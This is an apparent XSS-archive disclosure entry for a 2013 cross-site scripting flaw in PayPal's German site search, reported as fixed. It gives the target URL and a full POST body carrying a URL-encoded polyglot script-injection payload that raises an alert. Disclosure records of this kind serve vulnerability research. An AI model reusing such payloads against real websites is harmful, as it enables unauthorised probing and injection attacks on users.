Security researcher Robert K, has submitted on 26/05/2013 a cross-site-scripting (XSS) vulnerability affecting www.paypal.com, which at the time of submission ranked 38 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/09/2013. It is currently fixed. |
Date submitted: 26/05/2013 |
Date published: 13/09/2013 |
Date fixed: 13/09/2013 | Status: FIXED |
Author: Robert K |
Domain: www.paypal.com |
Category: XSS |
Pagerank: 38 |
URL: https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search |
POST: queryString_acInput=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String .fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2 F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT %3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&queryString=%27%3Balert%28String. fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F% 22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2 C83%2C83%29%29%2F%2F--+%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83% 2C83%29%29%3C%2FSCRIPT%3E&buttonSearchTop=Suchen&form_charset=UTF-8 |
Click here to view the mirror
|
|
|